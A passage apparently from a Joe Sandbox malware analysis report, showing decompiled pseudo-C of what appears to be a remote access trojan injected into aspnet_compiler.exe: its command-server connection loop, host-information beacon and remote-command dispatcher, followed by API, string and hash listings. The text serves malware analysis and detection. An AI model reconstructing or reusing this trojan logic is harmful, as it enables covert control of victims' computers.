                    				void* _t254;
                    				void* _t255;
                    				void* _t258;
                    				void* _t259;
                    				void* _t260;
                    				void* _t263;
                    				void* _t265;
                    				void* _t267;
                    				void* _t268;
                    				void* _t269;
                    				void* _t270;
                    				void* _t271;
                    				void* _t273;
                    				void* _t274;
                    				void* _t275;
                    				intOrPtr* _t379;
                    				void* _t395;
                    				void* _t401;
                    				void* _t403;
                    				void* _t405;
                    				void* _t407;
                    				char* _t409;
                    				long _t413;
                    				void* _t414;
                    				struct _SECURITY_ATTRIBUTES* _t415;
                    				char* _t443;
                    				char* _t487;
                    				void* _t678;
                    				void* _t690;
                    				void* _t749;
                    				signed short _t751;
                    				void* _t760;
                    				void* _t761;
                    				void* _t762;
                    				void* _t763;
                    				void* _t764;
                    				void* _t765;
                    				void* _t766;
                    				void* _t767;
                    				void* _t768;
                    				void* _t769;
                    				void* _t770;
                    				void* _t771;
                    				void* _t775;
                    				void* _t776;
                    				void* _t777;
                    				void* _t778;
                    				void* _t779;
                    				void* _t780;
                    				void* _t781;
                    				void* _t782;
                    				void* _t783;
                    				void* _t784;
                    				long _t786;
                    
                    				_push(_t414);
                    				_push(_t753);
                    				E004020BF(_t414,  &_v100);
                    				E0041A40E( &_v280, _t678);
                    				E004020BF(_t414,  &_v1576);
                    				_t749 = 0x473298;
                    				_t177 = E0043A3AC(_t175, E00401F8B(E00401E45(0x473298, _t678, _t760, _t784, 0x29)));
                    				if(_t177 != 0) {
                    					_t413 = _t177 * 0x3e8;
                    					_t786 = _t413;
                    					Sleep(_t413);
                    				}
                    				_t762 = _t761 - 0x18;
                    				E00402073(_t414, _t762, _t678, _t760, 0x46a630);
                    				_t179 = E00401E45(_t749, _t678, _t760, _t786, 0);
                    				_t763 = _t762 - 0x18;
                    				E004020D6(_t414, _t763, _t678, _t786, _t179);
                    				E0041A976( &_v76, _t678);
                    				_t764 = _t763 + 0x30;
                    				_t415 = 0; // executed
                    				E0040487E(); // executed
                    				E00401E45(_t749, _t678, _t760, _t786, 0x3a);
                    				_t679 = 0x464074;
                    				_t184 = E0040AF37(_t786);
                    				_t787 = _t184;
                    				if(_t184 != 0) {
                    					E00401E45(_t749, 0x464074, _t760, _t787, 0x3a);
                    					_t401 = E0040245C();
                    					_t403 = E00401F8B(E00401E45(_t749, 0x464074, _t760, _t787, 0x3a));
                    					E00401E45(_t749, 0x464074, _t760, _t787, 0x39);
                    					_t405 = E0040245C();
                    					_t407 = E00401F8B(E00401E45(_t749, 0x464074, _t760, _t787, 0x39));
                    					E00401E45(_t749, 0x464074, _t760, _t787, 0x38);
                    					_t409 = E0040245C();
                    					_t753 = _t409;
                    					E00401F8B(E00401E45(_t749, _t679, _t760, _t787, 0x38));
                    					_t679 = _t409;
                    					E0040471D(0, _t409, _t760, _t407, _t405, _t403, _t401);
                    					_t764 = _t764 + 0x10;
                    				}
                    				L4:
                    				_t765 = _t764 - 0x18;
                    				 *0x473519 = 1;
                    				E00402073(_t415, _t765, _t679, _t760, 0x46a634);
                    				_t186 = E00401E45( &_v76, _t679, _t760, _t787, _t415);
                    				_t766 = _t765 - 0x18;
                    				E004020D6(_t415, _t766, _t679, _t787, _t186);
                    				E0041A976( &_v16, _t679);
                    				_t767 = _t766 + 0x30;
                    				_t189 = E00401E45( &_v16, _t679, _t760, _t787, 1);
                    				E00401FC2(0x47351c, _t191, _t753, E00402EF0(_t415,  &_v40, E00406292( &_v64, E00401E45( &_v16, _t679, _t760, _t787, 0), _t760, 0x46a634), _t760, _t787, _t189));
                    				E00401FB8();
                    				E00401FB8();
                    				E00401E45( &_v16, _t191, _t760, _t787, 2);
                    				_t682 = "0";
                    				_t197 = E00405AE5("0");
                    				_t443 =  &_v100;
                    				_t788 = _t197;
                    				if(_t197 == 0) {
                    					 *0x470ae4 = 1;
                    					_push("TLS On ");
                    				} else {
                    					 *0x470ae4 = 0;
                    					_push("TLS Off");
                    				}
                    				L00405A86(_t415, _t443, _t682);
                    				_t768 = _t767 - 0x18;
                    				E00402EF0(_t415, _t768, E00408832(_t415,  &_v40, E004052FE( &_v64, "Connecting  | ", _t760,  &_v100), _t749, _t760, _t788, " | "), _t760, _t788, 0x47351c);
                    				_t769 = _t768 - 0x14;
                    				E00402073(_t415, _t769, _t201, _t760, "i");
                    				E0041A04A(_t415, _t749);
                    				_t764 = _t769 + 0x30;
                    				E00401FB8();
                    				E00401FB8();
                    				_t208 = E00401F8B(E00401E45( &_v16, _t201, _t760, _t788, 1));
                    				_t210 = E00401F8B(E00401E45( &_v16, _t201, _t760, _t788, 0));
                    				_t679 = _t208;
                    				_t211 = E00414230(_t210, _t208,  &_v64,  &_v64);
                    				_t789 = _t211;
                    				if(_t211 == 0) {
                    					_t753 = 0x4734e8;
                    					_t212 = E0040480D(0x4734e8);
                    					__eflags = _t212;
                    					if(_t212 != 0) {
                    						E00404F31(0x4734e8, 0x3c, 0); // executed
                    						_t214 = E004048A8(0x4734e8, 0x4734e8, 0x4734e8); // executed
                    						__eflags = _t214;
                    						if(__eflags != 0) {
                    							_t222 = E00401E45( &_v16, _t679, _t760, __eflags, 1);
                    							_t770 = _t764 - 0x18;
                    							_t223 = E00401E45( &_v16, _t679, _t760, __eflags, 0);
                    							_t690 = E00408832(_t415,  &_v124, E00402EF0(_t415,  &_v208, E00408832(_t415,  &_v232, E004052FE( &_v256, "Connected   | ", _t760,  &_v100), _t749, _t760, __eflags, " | "), _t760, __eflags, _t223), _t749, _t760, __eflags, 0x46a634);
                    							E00402EF0(_t415, _t770, _t690, _t760, __eflags, _t222);
                    							_t771 = _t770 - 0x14;
                    							E00402073(_t415, _t771, _t690, _t760, "i");
                    							E0041A04A(_t415, _t749);
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							_v160 = 0;
                    							asm("stosd");
                    							asm("stosd");
                    							asm("stosd");
                    							asm("stosd");
                    							asm("stosd"); // executed
                    							_t237 = E0041A33B( &_v256); // executed
                    							_push(_t690);
                    							E00413904( &_v160, "%I64u", _t237);
                    							E004086D0(_t415,  &_v40, _t690, __eflags, 0x4730a0);
                    							E00440751( &_v40,  *0x46f9d0,  &_v136, 0xa);
                    							E004020D6(_t415,  &_v184, _t690, __eflags, E00401E45(0x473298, _t690, _t760, __eflags, 1));
                    							_t245 = E0040245C();
                    							_t246 = E00401F8B(0x473280);
                    							_t487 = 0x473238;
                    							_t691 = E00401F8B(0x473238); // executed
                    							_t249 = E004129E0(_t248, "name",  &_v2580, 0x104, _t246, _t245); // executed
                    							_t775 = _t771 + 0x60;
                    							__eflags = _t249;
                    							if(_t249 != 0) {
                    								_t487 =  &_v184;
                    								L00405A86(_t415, _t487, _t691,  &_v2580);
                    							}
                    							_push(_t487);
                    							E0041288E( &_v64, 0x80000001, E00401F8B(0x473238), "hlight");
                    							_t252 =  *0x470d58; // 0x0
                    							_t776 = _t775 + 0xc;
                    							_t751 = 0;
                    							__eflags = _t252;
                    							if(__eflags != 0) {
                    								_t751 =  *_t252() & 0x0000ffff;
                    							}
                    							E0040415E(_t415,  &_v124, 0x80000001, _t760, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"); // executed
                    							_t254 = E0040D28D(__eflags); // executed
                    							_t255 = E0041A79D( &_v1552, _t254);
                    							_t777 = _t776 - 0x18;
                    							_t258 = E0041A879(_t415,  &_v1528, 0x473220);
                    							_t259 = E0041A6E9(_t415,  &_v1504, _t751 & 0x0000ffff);
                    							_t260 = E00401E45( &_v16, _t751 & 0x0000ffff, _t760, __eflags, 0);
                    							_t263 = E0041A6E9(_t415,  &_v1480, GetTickCount());
                    							_t265 = E0041A6E9(_t415,  &_v1456, E0041A641( &_v1480));
                    							_t267 = E0041A5F1(_t415,  &_v1432, 0x472ec8); // executed
                    							_t268 = E0041A879(_t415,  &_v1408, _t267);
                    							_t269 = E0041A879(_t415,  &_v1384, 0x472d40);
                    							_t270 = E0041A879(_t415,  &_v1360,  &_v124);
                    							_t271 = E0041A879(_t415,  &_v1336,  &_v40);
                    							_t273 = E0041A879(_t415,  &_v1312, 0x473618);
                    							_t274 = E0040EE14( &_v1288);
                    							_t275 = E0041A879(_t415,  &_v1264, 0x4732a4);
                    							_t679 = E00402EF0(_t415,  &_v256, E00402EF0(_t415,  &_v232, E00402EF0(_t415,  &_v208, E00402EF0(_t415,  &_v304, E00402EF0(_t415,  &_v328, E00402EF0(_t415,  &_v352, E00402EF0(_t415,  &_v376, E00402E81( &_v400, E00402EF0(_t415,  &_v424, E00402E81( &_v448, E00402EF0(_t415,  &_v472, E00402EF0(_t415,  &_v496, E00402EF0(_t415,  &_v520, E00402EF0(_t415,  &_v544, E00402EF0(_t415,  &_v568, E00408832(_t415,  &_v592, E00402EF0(_t415,  &_v616, E00402E81( &_v640, E00402EF0(_t415,  &_v664, E00402E81( &_v688, E00402EF0(_t415,  &_v712, E00408853(_t415,  &_v736, E00402EF0(_t415,  &_v760, E00402E81( &_v784, E00402EF0(_t415,  &_v808, E00402E81( &_v832, E00402EF0(_t415,  &_v856, E00402E81( &_v880, E00402EF0(_t415,  &_v904, E00402E81( &_v928, E00402EF0(_t415,  &_v952, E00408832(_t415,  &_v976, E00402EF0(_t415,  &_v1000, E00408832(_t415,  &_v1024, E00402EF0(_t415,  &_v1048, E00402E81( &_v1072, E00402EF0(_t415,  &_v1096, E00402EF0(_t415,  &_v1120, E00402EF0(_t415,  &_v1144, E00402E81( &_v1168, E00402EF0(_t415,  &_v1192, E00402E81( &_v1216, E00402F11( &_v1240,  &_v184, _t760, 0x472ec8), _t275), _t760, __eflags, 0x472ec8), _t274), _t760, __eflags, 0x472ec8), _t760, __eflags, 0x473950), _t760, __eflags, 0x472ec8), _t273), _t760, __eflags, 0x472ec8), 0x472ec8, _t760, __eflags,  &_v160), _t760, __eflags, 0x472ec8), 0x472ec8, _t760, __eflags, "4.6.0 Pro"), _t760, __eflags, 0x472ec8), _t271), _t760, __eflags, 0x472ec8), _t270), _t760, __eflags, 0x472ec8), _t269), _t760, __eflags, 0x472ec8), _t268), _t760, __eflags, 0x472ec8), 0x472ec8, _t760, __eflags,  *0x46f9d4 & 0x000000ff), _t760, __eflags, 0x472ec8), _t265), _t760, __eflags, 0x472ec8), _t263), _t760, __eflags, 0x472ec8), 0x472ec8, _t760, __eflags,  &_v136), _t760, __eflags, 0x472ec8), _t760, __eflags, _t260), _t760, __eflags, 0x472ec8), _t760, __eflags, 0x473268), _t760, __eflags, 0x472ec8), _t259), _t760, __eflags, 0x472ec8), _t258), _t760, __eflags, 0x472ec8), _t760, __eflags,  &_v280), _t760, __eflags, 
0x472ec8), _t760, __eflags, 0x4732d4), _t760, __eflags, 0x472ec8), _t760, __eflags,  &_v64), _t760, __eflags, 0x472ec8);
                    							E00402E81(_t777, _t318, _t255);
                    							_t753 = 0x4734e8;
                    							_push(0x4b);
                    							E00404A81(0x4734e8, _t318, __eflags);
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401EE9();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401EE9();
                    							E00404BF0(0x4734e8, _t318, E00414E1C, 1);
                    							_t379 =  *0x470d5c; // 0x0
                    							__eflags = _t379;
                    							if(_t379 != 0) {
                    								__eflags =  *0x470d4a;
                    								if( *0x470d4a != 0) {
                    									_t379 =  *_t379();
                    									 *0x470d4a = 0;
                    								}
                    							}
                    							__eflags =  *0x47308a;
                    							if( *0x47308a != 0) {
                    								_t379 = E0040A5C4(_t415, 0x473040, _t679);
                    							}
                    							E00405A4B(_t379);
                    							_t778 = _t777 - 0x18;
                    							E00402073(_t415, _t778, _t679, _t760, "Disconnected");
                    							_t779 = _t778 - 0x18;
                    							E00402073(_t415, _t779, _t679, _t760, "!");
                    							E0041A04A(_t415, 0x472ec8);
                    							_t764 = _t779 + 0x30;
                    							__eflags =  *0x472acb;
                    							if( *0x472acb != 0) {
                    								__eflags = 0;
                    								CreateThread(0, 0, E00419872, 0, 0, 0);
                    							}
                    							E00401FB8();
                    							E00401FB8();
                    							E00401EE9();
                    							_t749 = 0x473298;
                    						}
                    					} else {
                    						_t780 = _t764 - 0x18;
                    						E00402073(_t415, _t780, _t679, _t760, "Connection Error: Unable to create socket");
                    						_t781 = _t780 - 0x18;
                    						E00402073(_t415, _t781, _t679, _t760, "E");
                    						E0041A04A(_t415, _t749);
                    						_t764 = _t781 + 0x30;
                    					}
                    				} else {
                    					__imp__#111();
                    					_t395 = E0041B45A( &_v40, _t211);
                    					_t782 = _t764 - 0x18;
                    					_t679 = "Connection Error: ";
                    					E004052DD(_t415, _t782, "Connection Error: ", _t760, _t789, _t395);
                    					_t783 = _t782 - 0x14;
                    					E00402073(_t415, _t783, "Connection Error: ", _t760, "E");
                    					E0041A04A(_t415, _t749);
                    					_t764 = _t783 + 0x30;
                    					E00401FB8();
                    					_t753 = 0x4734e8;
                    				}
                    				E00404E06(_t679);
                    				_t415 =  &(_t415->nLength);
                    				_t216 = E004021DA( &_v76);
                    				_t790 = _t415 - _t216;
                    				if(_t415 >= _t216) {
                    					_t415 = 0;
                    					_t221 = E0043A3AC(_t218, E00401F8B(E00401E45(_t749, _t679, _t760, _t790, 2))) * 0x3e8;
                    					_t787 = _t221;
                    					Sleep(_t221);
                    				}
                    				E00401E6D( &_v16, _t679);
                    				goto L4;
                    			}

                    APIs
                    • Sleep.KERNEL32(00000000,00000029,00473238,00473298,00000000), ref: 004142C2
                    • WSAGetLastError.WS2_32(00000000,00000001), ref: 004144D3
                    • Sleep.KERNEL32(00000000,00000002), ref: 00414E09
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$ErrorLastLocalTime
                    • String ID: 2G$ | $%I64u$4.6.0 Pro$82G$@-G$@0G$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name$4G$4G$4G$Cqt
                    • API String ID: 524882891-3434259954
                    • Opcode ID: 4496f8889da1b28f6c22a62faec8c28fb262ed6628df1ca4bb2a39669b70bbd6
                    • Instruction ID: ab0e32b11b9d89d3eba901e54de1f942eff96493c18d1503d8c82c51ace3a389
                    • Opcode Fuzzy Hash: 4496f8889da1b28f6c22a62faec8c28fb262ed6628df1ca4bb2a39669b70bbd6
                    • Instruction Fuzzy Hash: 52529D31A001155BCB18F761DD96AEEB3699F90308F1041BFF40A761E2EF785F868A9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph: function at 414e1c (legend: Executed, Not Executed)
                    C-Code - Quality: 80%
                    			E00414E1C(void* __ebx, CHAR* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a77, intOrPtr _a79, intOrPtr _a81, intOrPtr _a86, intOrPtr _a89) {
                    				char _v28;
                    				char _v56;
                    				void* _v60;
                    				char _v80;
                    				void* _v84;
                    				char _v104;
                    				void* _v108;
                    				char _v128;
                    				void* _v132;
                    				void* _v156;
                    				char _v260;
                    				char _v264;
                    				char _v272;
                    				char _v284;
                    				char _v288;
                    				char _v300;
                    				char _v304;
                    				char _v308;
                    				char _v312;
                    				char _v332;
                    				void* _v344;
                    				long _v348;
                    				int _v352;
                    				char _v356;
                    				char _v360;
                    				void* _v364;
                    				char _v376;
                    				char _v380;
                    				char _v384;
                    				char _v392;
                    				char _v396;
                    				char _v400;
                    				void* _v404;
                    				int _v408;
                    				char _v412;
                    				char _v416;
                    				char _v428;
                    				char _v432;
                    				char _v436;
                    				char _v440;
                    				char _v444;
                    				char _v448;
                    				char _v452;
                    				char _v456;
                    				char _v460;
                    				char _v464;
                    				char _v468;
                    				char _v476;
                    				char _v492;
                    				char _v496;
                    				char _v500;
                    				char _v504;
                    				intOrPtr _v855621291;
                    				intOrPtr _v1124056743;
                    				void* __ebp;
                    				void* _t321;
                    				void* _t323;
                    				intOrPtr _t451;
                    				intOrPtr _t452;
                    				void* _t453;
                    				void* _t455;
                    				signed int _t456;
                    				signed int _t460;
                    				signed int _t462;
                    				void* _t465;
                    				void* _t466;
                    				void* _t467;
                    				void* _t471;
                    				void* _t477;
                    
                    				_t476 = __eflags;
                    				_t437 = __edx;
                    				_t371 = __ebx;
                    				_t460 = _t462;
                    				_push(__ebx);
                    				_t451 = _a4;
                    				E004020D6(__ebx,  &_v308, __edx, __eflags, _t451 + 0xc);
                    				SetEvent( *(_t451 + 0x24));
                    				_t452 =  *((intOrPtr*)(E00401F8B( &_v312)));
                    				E00404182( &_v312,  &_v288, 4, 0xffffffff);
                    				_t465 = (_t462 & 0xfffffff8) - 0x1a4;
                    				E004020D6(__ebx, _t465, _t437, _t476, 0x472ec8);
                    				_t466 = _t465 - 0x18;
                    				E004020D6(__ebx, _t466, _t437, _t476,  &_v304);
                    				E0041A976( &_v468, _t437);
                    				_t467 = _t466 + 0x30;
                    				_t477 = _t452 - 0x8f;
                    				if(_t477 > 0) {
                    					_t453 = _t452 + 0xffffff70;
                    					__eflags = _t453 - 0x3b;
                    					if(__eflags <= 0) {
                    						switch( *((intOrPtr*)(( *(_t453 + 0x416280) & 0x000000ff) * 4 +  &M0041621C))) {
                    							case 0:
                    								__ecx =  &_v444;
                    								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    								__eax = E00401F8B(__ecx);
                    								__ecx = __eax;
                    								__eax = E00409003(__ecx);
                    								goto L138;
                    							case 1:
                    								__ecx =  &_v444;
                    								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    								__eax = E00401F8B(__eax);
                    								__eax = StrToIntA(__eax);
                    								__ecx =  &_v448;
                    								__edi = __eax;
                    								__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 1);
                    								__eax = E00401F8B(__eax);
                    								__dl = 0x30;
                    								__ecx =  &_v440;
                    								__eax = E0040CF38( &_v440, __edx, __eax);
                    								__ecx =  &_v440;
                    								__eax = E00401EE4( &_v440);
                    								__ecx =  &_v452;
                    								__esi = __eax;
                    								__eax = E00401E45( &_v452, __edx, __ebp, __eflags, 2);
                    								__edx = __esi;
                    								__ecx = __eax;
                    								__eax = E0041AE6B(__eax, __esi);
                    								__ecx =  &_v444;
                    								__edx = E00401EE4( &_v444);
                    								__ecx = __edi;
                    								__eax = E0041B35B(__edi, __edx);
                    								goto L103;
                    							case 2:
                    								__ecx =  &_v444;
                    								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 1);
                    								__eax = E00401F8B(__eax);
                    								__ecx =  &_v448;
                    								__ecx = E00401E45( &_v448, __edx, __ebp, __eflags, 0);
                    								__eax = E00401F8B(__ecx);
                    								__eax = SetWindowTextW(__eax, __eax);
                    								goto L22;
                    							case 3:
                    								__ebx = 0;
                    								__ecx =  &_v444;
                    								__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    								__edx = "0";
                    								__ecx = __eax;
                    								__eax = E00405AE5(__edx);
                    								__ecx =  &_v448;
                    								_push(0);
                    								__eflags = __al;
                    								if(__eflags == 0) {
                    									__eax = E00401E45( &_v448, __edx, __ebp, __eflags);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E004020D6(0, __esp, __edx, __eflags, __eax);
                    									__ecx = 0x4732ec;
                    								} else {
                    									__eax = E00401E45( &_v448, __edx, __ebp, __eflags);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E004020D6(0, __esp, __edx, __eflags, __eax);
                    									__ecx = 0x470d62;
                    								}
                    								__eax = E004162CD(__ebx, __ecx, __edx);
                    								goto L138;
                    							case 4:
                    								__ecx =  &_v444;
                    								__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E00416495(__ecx, __edx, __edi, __eflags);
                    								goto L100;
                    							case 5:
                    								E004020D6(__ebx, _t467 - 0x18, _t437, __eflags, E00401E45( &_v444, _t437, _t460, __eflags, 0));
                    								E004071BD(_t371, _t437);
                    								goto L100;
                    							case 6:
                    								__ecx =  &_v444;
                    								__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E00418608(__ebx, __edx, __esi, __ebp);
                    								goto L100;
                    							case 7:
                    								__ecx =  &_v444;
                    								__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E00403F08(__ebx, __edx, __esi, __ebp, __eflags);
                    								goto L100;
                    							case 8:
                    								__eax = E00419872(__ebx);
                    								goto L138;
                    							case 9:
                    								__eax = E00419991(__ebx, __eflags);
                    								goto L138;
                    							case 0xa:
                    								__eax = E004199D0(__eax);
                    								goto L138;
                    							case 0xb:
                    								__ebx = 0;
                    								__ecx =  &_v444;
                    								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    								__eax = E004051C3(0);
                    								__ecx =  &_v452;
                    								__eflags =  *__eax - __bl;
                    								__ebx = 0 | __eflags != 0x00000000;
                    								__eax = E00401E45( &_v452, __edx, __ebp, __eflags, 1);
                    								__dl = __bl;
                    								__ecx = __eax;
                    								__eax = E00419970(__ecx, __edx, __esi);
                    								goto L138;
                    							case 0xc:
                    								__eax = E004199D8(__edx);
                    								goto L138;
                    							case 0xd:
                    								__eflags =  *0x46f9d0 - 1;
                    								if(__eflags != 0) {
                    									__eflags = E00406D6C();
                    									if(__eflags != 0) {
                    										goto L130;
                    									}
                    								} else {
                    									__ecx =  &_v444;
                    									__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    									__edx =  *0x46f9d0; // 0x1
                    									__ecx =  &_v380;
                    									__esp = __esp - 0x18;
                    									__esi = __esp;
                    									__edx = E0041A6E9(__ebx,  &_v380, __edx);
                    									__ecx =  &_v404;
                    									__edx = __eax;
                    									__ecx = __esi;
                    									__eax = E00402EF0(__ebx, __esi, __edx, __ebp, __eflags, __eax);
                    									_push(0xab);
                    									goto L14;
                    								}
                    								goto L138;
                    							case 0xe:
                    								__eflags =  *0x470d48;
                    								if( *0x470d48 != 0) {
                    									ShowWindow( *0x472b10, 9) = SetForegroundWindow( *0x472b10);
                    								} else {
                    									__cl = 1;
                    									__eax = E0041B6A6(__ebx, __ecx, __edx, __edi);
                    									__ebx = 0;
                    									__eax = CreateThread(0, 0, E0041BD68, 0, 0, 0);
                    									 *0x470d48 = 2;
                    								}
                    								goto L138;
                    							case 0xf:
                    								_push(5);
                    								goto L18;
                    							case 0x10:
                    								__ebx = 0;
                    								_push(0);
                    								_push(0);
                    								goto L19;
                    							case 0x11:
                    								__ecx =  &_v260;
                    								__eax = E004081D8( &_v260);
                    								__ecx =  &_v444;
                    								__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 2);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
                    								__ecx =  &_v452;
                    								__eax = E00401E45( &_v452, __edx, __ebp, __eflags, 1);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
                    								__ecx =  &_v460;
                    								__eax = E00401E45( &_v460, __edx, __ebp, __eflags, 0);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E004020D6(__ebx, __esp, __edx, __eflags, __eax);
                    								__ecx =  &_v284;
                    								__eax = E0040647B(__ebx,  &_v284, __edx);
                    								__ecx =  &_v356;
                    								__eax = E004081E6();
                    								goto L138;
                    							case 0x12:
                    								_push(1);
                    								__ecx =  &_v444;
                    								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    								__eax = E00401F8B(__eax);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E00402073(__ebx, __esp, __edx, __ebp, __eax);
                    								_push("hlight");
                    								__ecx = 0x473238;
                    								__edx = E00401F8B(0x473238);
                    								__eax = E00412A57(0x473238, __edx);
                    								__esp = __esp + 0x20;
                    								goto L138;
                    							case 0x13:
                    								__ecx =  &_v432;
                    								__eax = E00405B0B(__ebx,  &_v432, __eflags);
                    								__ecx =  &_v444;
                    								__eax = E00401E45( &_v444, __edx, __ebp, __eflags, 1);
                    								__ecx =  &_v448;
                    								__edx = E00401E45( &_v448, __edx, __ebp, __eflags, 0);
                    								__ecx =  &_v384;
                    								__edx = __eax;
                    								__ecx =  &_v408;
                    								__edx = __eax;
                    								__ecx =  &_v440;
                    								__eax = E00405EDA( &_v440, __edx, __eflags);
                    								__ecx =  &_v408;
                    								__eax = E00401FB8();
                    								__ecx =  &_v384;
                    								goto L135;
                    							case 0x14:
                    								__ecx =  &_v444;
                    								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    								__eax = E00401F8B(__ecx);
                    								__ecx = __eax;
                    								__eax = E0041A664(__ecx);
                    								goto L138;
                    							case 0x15:
                    								__ecx =  &_v444;
                    								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    								__eax = E00401F8B(__ecx);
                    								__ecx = __eax;
                    								__eax = E0041A690(__ecx);
                    								goto L138;
                    							case 0x16:
                    								__ecx =  &_v432;
                    								__eax = E004020BF(__ebx,  &_v432);
                    								__ecx =  &_v444;
                    								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 0);
                    								__eax = E00401F8B(__eax);
                    								__edx =  &_v436;
                    								__ecx = __eax;
                    								__eax = E0041ADFE(__edx);
                    								__esp = __esp - 0x18;
                    								__eax =  &_v436;
                    								__esi = __esp;
                    								__ecx =  &_v448;
                    								_push( &_v436);
                    								_push(0x472ec8);
                    								_push(E00401E45( &_v448, __edx, __ebp, __eflags, 2));
                    								__ecx =  &_v452;
                    								__edx = E00401E45( &_v452, __edx, __ebp, __eflags, 1);
                    								__ecx =  &_v344;
                    								__eax = E00402F11( &_v344, __eax, __ebp, __edi);
                    								goto L134;
                    							case 0x17:
                    								__ecx =  &_v444;
                    								__ecx = E00401E45( &_v444, __edx, __ebp, __eflags, 1);
                    								__eax = E00401F8B(__eax);
                    								__ecx =  &_v448;
                    								__esi = __eax;
                    								__eax = E00401E45( &_v448, __edx, __ebp, __eflags, 2);
                    								__edx = __esi;
                    								__ecx = __eax;
                    								__eax = E0041AE6B(__eax, __edx);
                    								__ecx =  &_v440;
                    								__eax = E004020BF(__ebx,  &_v440);
                    								__ecx =  &_v452;
                    								__ecx = E00401E45( &_v452, __edx, __ebp, __eflags, 1);
                    								__eax = E00401F8B(__eax);
                    								__edx =  &_v444;
                    								__ecx = __eax;
                    								__eax = E0041ADFE(__edx);
                    								__esp = __esp - 0x18;
                    								__eax =  &_v444;
                    								__esi = __esp;
                    								__ecx =  &_v456;
                    								_push( &_v444);
                    								_push(0x472ec8);
                    								_push(E00401E45( &_v456, __edx, __ebp, __eflags, 0));
                    								__edx = "0";
                    								__ecx =  &_v348;
                    								__eax = E004052FE( &_v348, "0", __ebp, __edi);
                    								L134:
                    								_pop(__ecx);
                    								__edx = __eax;
                    								__ecx =  &_v376;
                    								__eax = E00402EF0(__ebx,  &_v376, __eax, __ebp, __eflags);
                    								_pop(__ecx);
                    								__edx = __eax;
                    								__ecx =  &_v400;
                    								__eax = E00402EF0(__ebx,  &_v400, __eax, __ebp, __eflags);
                    								_pop(__ecx);
                    								__edx = __eax;
                    								__ecx = __esi;
                    								__eax = E00402EF0(__ebx, __esi, __edx, __ebp, __eflags);
                    								_pop(__ecx);
                    								_push(0xca);
                    								__ecx = 0x4734e8;
                    								__eax = E00404A81(0x4734e8, __edx, __eflags);
                    								__ecx =  &_v428;
                    								__eax = E00401FB8();
                    								__ecx =  &_v404;
                    								__eax = E00401FB8();
                    								__ecx =  &_v360;
                    								L135:
                    								__eax = E00401FB8();
                    								goto L136;
                    							case 0x18:
                    								goto L138;
                    						}
                    					}
                    					goto L138;
                    				} else {
                    					if(_t477 == 0) {
                    						L140();
                    						_v348 = E0043A3AC(_t314, E00401F8B(E00401E45( &_v444, _t437, _t460, __eflags, 2)));
                    						_v344 =  &_v264;
                    						E0041689B(__ebx, _t437, 0x472ec8, _t460, __eflags,  &_v348);
                    						_t133 = E004090DA() - 1; // -1
                    						_t455 = _t133;
                    						_t321 = E00401E45( &_v452, _t437, _t460, __eflags, 3);
